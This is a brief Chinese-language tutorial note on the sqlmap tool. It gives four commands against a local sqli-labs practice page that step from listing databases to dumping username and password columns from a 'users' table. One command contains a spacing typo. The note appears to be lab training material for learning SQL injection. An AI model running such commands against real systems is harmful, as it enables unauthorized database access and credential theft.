class4-sqlmap使用

sqlmap神器使用

sqlmap使用(仅仅读取数据):
1,获取当前所有数据库
sqlmap -u “http://127.0.0.1/sql/Less-1/?id=1” --dbs --batch

2,获取当前数据库a中的所有表
sqlmap -u “http://127.0.0.1/sql/Less-1/?id=1” -D security --tables --batch

3,获取数据库a中的b表的所有列

sqlmap -u “http://127.0.0.1/sql/Less-1/?id=1” -D security -T users–columns --batch

4,获取数据库a中的b表的c列的的数据
sqlmap -u “http://127.0.0.1/sql/Less-1/?id=1” -D security -T users -C username,password --dump --batch

结束

你可能感兴趣的:(sql注入)